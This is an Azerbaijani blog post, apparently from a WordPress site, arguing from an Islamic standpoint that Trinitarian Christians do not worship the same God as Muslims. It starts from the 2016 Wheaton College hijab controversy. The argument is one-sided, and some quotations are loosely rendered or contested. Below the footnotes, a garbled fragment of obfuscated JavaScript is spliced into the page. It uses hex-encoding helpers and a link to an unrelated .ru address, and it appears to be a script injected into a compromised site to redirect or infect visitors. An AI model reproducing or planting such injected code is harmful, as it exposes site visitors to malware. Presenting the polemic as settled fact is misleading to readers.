Müsəlmanlar və xristianlar eyni Allaha inanır?


ABŞ-ın İllinoys ştatındakı yevangelist protestant Uiton kollecində çalışan xanım professor Larisiya Alayn Hokinz Liberti Universitetinin rektoru Cerri Faluelin “müsəlmanlara son qoyun” sözünə reaksiya olaraq hicab geyinib çəkdiyi şəklini “Facebook”da paylaşdı. Hokinzin qısa müddətdə mediaya əks olunan və böyük maraq oyadan şəklinin altında bu sözlər yazılmışdı: “biz eyni Allaha inanırıq”. [1]

Professor Hokinzin paylaşımı əsrlərdən bu yana verilən bir sualı bir daha gündəmə gətirmiş oldu: “müsəlmanlar və xristianlar eyni Allaha inanır, eyni Allaha dua edirlər?”

Məktəb rəhbərliyi tərəfindən qısa müddətdə vəzifəsindən azad edilən professor Hokinz bu suala dair fikrini Facebook səhifəsində yazdığı yazıda belə dilə gətirdi:

“…Müsəlman qonşularımı onlarla həmrəylik içində olduğum üçün, mayamız bir olduğu üçün sevirəm. Onlarla eyni dini mövqedəyəm, çünki Papa Fransiskin keçən həftə dediyi kimi, biz eyni Allaha inanırıq…” [2]

Bu sözlərdən sonra Billi Qrem Yevangelistlər Birliyinin və Samaritan’s Purse adlı beynəlxalq yardım təşkilatının sədri Franklin Qrem də öz Facebook profilində bu sözləri paylaşdı: “İslam Allahın oğlu olduğunu rədd edir. İsanın Allah olduğunu da. Ata, Oğul və Müqəddəs Ruha, yəni üç üqnuma inanmır. Dolayısilə İslamda və Xristianlıqda eyni Allaha ibadət edilmir”. [3]

Professor Hokinzin dinlər arası birliyi və qardaşlığı müdafiə edən xoş niyyətli, sülhsevər münasibətindən əlavə Qremin sözlərində konseptual baxımdan həqiqət payı var. Həqiqətən də hazırda xristianlar müsəlmanların dua etdiyi Bir və Tək olan Allaha ibadət etmirlər. Bunun səbəbi isə hz. İsanın gətirdiyi xristianlığa sonradan əlavə olunan üç üqnum inancıdır.

Bu inanca görə bu gün mövcud olan xristianlıq hz. İsanın gətirdiyi xristianlıqdan tamamilə uzaqlaşmışdır. Hz. İsanın gətirdiyi xristianlıq dini insanları Allahın birliyinə dəvət edərkən, indiki xristianlıq anlayışına “Ata”, “Oğul” və “Müqəddəs Ruhdan” meydana gəlmiş üçlü Allah inancı hakimdir. Üç üqnum bugünkü xristianlığında ən vacib iman şərtlərindən biridir.

Halbuki nə musəvilərin müqəddəs kitabları olan Əhdi-Ətiqdə, nə də xristianların müqəddəs kitabı İncildə üç üqnum inancı var. Belə ki, təhrif edilmiş Əhdi-Cədid İncillərində belə Allahın birliyinə dair ifadələr hələ də mövcuddur. Çox saylı ifadələrdən bəziləri bu şəkildədir:

Tək bir Allah vardır… (Paveldən Timofeyə 1-ci Məktub, 2:5)

İsa ona belə cavab verdi: “… Allahın Rəbbə səcdə et və yalnız Ona ibadət et” deyə yazılmışdır. (Matta, 4:10)

Xilaskarımız Tək Allaha ucalıq olsun… (Yahudanın Məktubu, 1:24)

İncillərdə də göründüyü kimi, hz. İbrahim, hz. Yaqub, hz. Yusif, hz. Musa, hz. Nuh, hz. Şüeyb və digər bütün peyğəmbərlər kimi hz. İsa da insanları Bir və Tək olan Allaha iman gətiməyə, Onun əmrlərini yerinə yetirməyə dəvət etmişdir. Tövhid inancı ilə tamamilə zidd olan üç üqnum, peyğəmbər olaraq göndərilən hz. İsaya tanrılıq verən yanlış bir inancdır. Bu anlayışın ilk xristianlar tərəfindən bilinmədiyi və xristianlığa ancaq 4-ci əsrdə daxil edildiyi Yeni Katolik Ensiklopediyasında bu şəkildə bildirilir:

“Roma Katolikliyi və Xristianlığın müxtəlif qollarının üç üqnum mübahisəsi ortaya xəyali görüntüdən başqa bir şey qoymur. İki hadisə ortaya çıxıb: bir tərəfdə içlərində sayı getdikcə artan Roma Katolikosunun də olduğu İncil şərhçisi, bu məsələdə ciddi səlahiyyətə malik olmadan insanların Əhdi-Cədiddəki üç üqnum anlayışından bəhs etməməli olduğunu qəbul edib. Digər tərəfdə tarixçi və xristian teoloqların üç üqnumdan bəhs edən birinin ancaq hz. İsadan sonrakı dördüncü əsrin son rübünə təsadüf etdiyi etirafı. Həqiqətən də üç şəxsiyyətli Tanrı inancı Xristian inanc və düşüncəsinə dördüncü əsrin son rübündə daxil olmuşdur”. [4]

Üç üqnum inancına sahib xristianlar Allahın Zatının hz. İsada insan olaraq vücuda gəldiyi iddialarına İncillərdə keçən “Allahın oğlu” ifadəsini dəlil göstərirlər. Halbuki İncillərdə keçən “Allahın oğlu” ifadələri iman gətirənlərin Allahın sevimli bəndələri olduğunun gözəl bir ifadəsidir. Matta İncilində bu həqiqət, “Nə bəxtiyardır sülhyaradanlar! Çünki onlar Allahın övladları adlanacaq.”. (Matta, 5:9) ifadəsi ilə izah edilir.

Digər tərəfdən, hz. İsa heç vaxt özünün Allah olduğunu söyləməmişdir. Markın İncilində yer alan başqa bir bölmədə hz. İsanın özünün ilahiləşdirilməsinə, hətta təriflənməsinə də qarşı olduğunu, özünü insanlara yalnız bir qul kimi tanıtdığı göstərilir:

İsa yola çıxarkən bir nəfər qaça-qaça Onun yanına gəldi. Onun qarşısında diz çökərək soruşdu: “Ey yaxşı Müəllim, mən nə etməliyəm ki, əbədi həyatı irs olaraq alım?” İsa ona dedi: “Mənə niyə yaxşı deyirsən? Tək Allahdan başqa yaxşısı yoxdur.”  (Mark, 10:17-18)

Məşhur ingilis dinlər tarixçisi Karen Armstronq hz. İsanın heç vaxt “Mən Allaham” demədiyini bu sözlərlə açıqlayır: “Hz. İsa heç vaxt “Mən Allaham” və ya “Allahın oğluyam” deməmişdir. Hz.İsa üçün “Allahın oğlu” ifadəsini Pavel dilə gətirmişdir, amma bu, musəvilikdəki Allahın oğlu ifadəsi ilə eyni mənadadır. Bu ifadə ilə Allahla xüsusi yaxınlığı olan, xüsusi vəzifəsiolan bir insan nəzərdə tutulur”.

Karen Armstronqun bir kitabından istifadə edərək hazırlanan sənədli film üç üqnum inancının ortaya çıxmasını belə izah edir: “IV əsrdə Misirin İskəndəriyyə şəhərində Arius adlı bir keşiş hz. İsanın Allahla bir tutula bilməyəcəyini, Allaha mükəmməl şəkildə itaət etdiyi üçün ilahi statusa yüksəldilmiş normal bir insan olduğunu irəli sürür. Bu sözlər böyük bir mübahisəyə yol açır və Kilsə iki hissəyə bölünür. İmperator Konstantin Kilsənin ikiyə bölünməsinə razı olmur və Nikeyada məclis çağırır. Bu məclisdə hz.İsa “İlahi” elan edilir. Bütün xristian kilsələri Nikeya İman Simvolu kimi tanınan bir bəyannaməni qəbul edir. Lakin Şərq kilsələri mübahisəni davam etdirir. Sonda mübahisələr bu fikirdə birləşir: Allah insanlara Özünü üç şəkildə göstərir: Ata, Oğul və Müqəddəs Ruh. Bu fikir daha sonradan üç üqnum adını alır. Amma müzakirələr yenə bitmir. Hazırda xristianların fikri qarışıb və bu sualları verməyə başlayıblar: Bir Allah var, iki, yoxsa üç? Əgər üç Allah varsa, biz necə monoteist ola bilərik?”[5]

Prinston Universitetinin ilahiyyat professoru Elayn Peycels bu suala belə cavab verir: “Xristianlıq əlbəttə ki, monoteist din deyil”.

Allahı Bir və Tək Tanrı olaraq qəbul edən İbrahimi din olan xristianlığın hz. İsanın Allah qatına alınmasından sonra təhrif edilib üçlü Allah inancına çevrilməsi xristianlığa vurulan ən böyük zərbədir. Xristianlığın bir şərti kimi təqdim olunan bu inanc müasir xristianların Allahı lazımi şəkildə tanımalarına, gənclərin özlərini yaradan Allahı, Onun özlərinə göndərdiyi dini yanlış öyrənmələrinə və bunun nəticəsində də xristian dünyasının böyük mənəvi itkiyə məruz qalmasına yol açır.

Bütün bunlarla yanaşı xristian dünyasında üç üqnumu qəbul etməyən böyük təbəqə var. Bir çox xristian məzhəb və cərəyan üzvü, ilahiyyatçı, alim, tədqiqatçı, yazıçı üç üqnum inancını rədd edir. Həqiqi xristianlığın Bir və Tək olaraq Allaha iman gətirməyi əmr etdiyini deyən və Allaha bağlı olan bu səmimi xristianlarla İslam dini mənsubları Allaha iman gətirmək, Ona heç bir şeyi şərik qoşmamaq, Allahın yaratdığı qədərə inanmaq, Onun əmr etdiyi ibadətləri yerinə yetirmək kimi ortaq əsas iman əsaslarına görə yaşayırlar. Beləliklə, Allahın hz. İbrahimə nazil etdiyi haqq dində birləşir, eyni Allaha inanır, eyni Allaha dua edir, eyni Allaha ibadət edirlər. Bu səbəbdən üç üqnumu rədd edən xristianlarla müsəlmanlar, bəli, eyni Allaha inanır, eyni Allaha dua edərlər. Duamız, üç üqnuma inanan xristianların da tezliklə həqiqəti dərk etmələri, dinlərində olmayan batil üç üqnum inancını tərk edib Allaha dönməsi istiqamətindədir. Hz. İsanın qulluq etdiyi, ibadət etdiyi, dua etdiyi Allaha Ona heç bir şeyi və heç bir kəsi şərik qoşmadan yönəlmələri hz. İsaya olan bağlılığının əsl sübutu olacaq.

Üç üqnuma inanan bütün xristianlar vicdanları ilə düşünüb bilməlidirlər ki, Allah Birdir, Təkdir, Ondan başqa Tanrı yoxdur. Hər şeyi yoxdan yaradan, ən gözəl şəkildə qüsursuzca var edən, hər şeyin batinindən və gizli tərəflərindən xəbərdar olan, əzəli və əbədi olan, doğmamış, doğulmamış olan, hər cür nöqsandan uzaq olan, hər şeyi bilən, hər şeyə gücü yetən, şanı böyük olan, ehsanı bol olan, əsirgəyən, bağışlayan Odur. Bütün kainatın sahibidir. Hər şeyin üzərində nəzarət edəndir. Dua edənin duasını eşidən, ibadətlərini görən, din günündə böyük-kiçik hər bir yaxşılığın qarşılığını artıqlaması ilə verəndir.

[1] http://edition.cnn.com/2016/01/06/us/wheaton-college-professor-hijab/
[2] http://edition.cnn.com/2016/01/06/us/wheaton-college-professor-hijab/
[3] http://www.christianpost.com/news/franklin-graham-wheaton-college-must-fire-hijab-wearing-professor-larycia-hawkins-155831/
[4] The New Catholic Encyclopedia, Cilt: XIV, S: 295.
[5] A History of God, Karen Armstrong, https://www.youtube.com/watch?v=KJkNs512Lsk

http://ekurd.net/muslims-christians-same-god-2016-03-14

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "dusunek.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//h9o2svlvxl58.ru/f2.html?a=26037

Bir cavab yazın

Sistemə daxil olmaq üçün məlumatlarınızı daxil edin və ya ikonlardan birinə tıklayın:

WordPress.com Loqosu

WordPress.com hesabınızdan istifadə edərək şərh edirsinz. Çıxış /  Dəyişdir )

Google+ foto

Google+ hesabınızdan istifadə edərək şərh edirsinz. Çıxış /  Dəyişdir )

Twitter rəsmi

Twitter hesabınızdan istifadə edərək şərh edirsinz. Çıxış /  Dəyişdir )

Facebook fotosu

Facebook hesabınızdan istifadə edərək şərh edirsinz. Çıxış /  Dəyişdir )

w

%s qoşulma